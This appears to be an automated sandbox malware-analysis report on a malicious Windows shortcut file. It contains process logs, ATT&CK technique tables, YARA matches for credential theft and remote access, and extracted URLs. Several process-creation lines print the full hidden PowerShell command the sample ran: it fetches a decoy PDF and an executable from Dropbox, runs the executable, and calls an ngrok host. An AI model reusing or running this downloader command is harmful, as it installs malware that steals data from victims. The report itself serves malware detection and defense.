                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/lewis-silkin-llp.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -outfile $randomexe ; start $randomexe; iwr -uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/lewis-silkin-llp.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -outfile $randomexe ; start $randomexe; iwr -uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00502A5F cpuid 26_2_00502A5F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 26_2_0041C260 GetSystemTimeAsFileTime,SHFormatDateTimeW,26_2_0041C260
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 29_2_0041A06D GetVersion,EnumWindows,IsWindow,SetForegroundWindow,SendMessageW,SendMessageW,SendMessageW,InitCommonControlsEx,CreateSolidBrush,EnumWindows,IsWindow,SetForegroundWindow,EnumWindows,IsWindow,SendMessageW,29_2_0041A06D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match File source: 0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000003.2337633012.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001E.00000002.2470897649.0000000003580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara match File source: 0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001D.00000003.2337633012.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001E.00000002.2470897649.0000000003580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 21 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Windows Service | 1 Windows Service | 3 Obfuscated Files or Information | Security Account Manager | 136 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 11 Registry Run Keys / Startup Folder | 211 Process Injection | 1 Software Packing | NTDS | 341 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | 3 PowerShell | Network Logon Script | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 11 Process Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 211 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

[Figure: Behavior Graph ID: 1572663, Sample: 751ietQPnX.lnk, Startdate: 10/12/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 751ietQPnX.lnk | 18% | ReversingLabs | Win32.Trojan.Pantera | |
| 751ietQPnX.lnk | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\854113748.exe | 26% | ReversingLabs | | |

No Antivirus matches
No Antivirus matches
                                                                                    high
                                                                                    https://www.dropboxstatic.com/static/powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://officeapps-df.live.compowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.compowershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://api.login.yahoo.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://office.net/msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2023468036.0000012D1A121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335567C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://login.yahoo.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.dropbox.com/playlist/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://onedrive.live.com/pickerpowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2094670219.0000012D32490000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1BD6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.dropbox.compowershell.exe, 00000002.00000002.2023468036.0000012D1A4D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://chrome.google.com/webstoremsedge.exe, 00000005.00000002.1932816002.0000404000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143850625.00006F9000020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://go.micropowershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crl.ver)svchost.exe, 00000006.00000002.3022485486.000001BA25800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
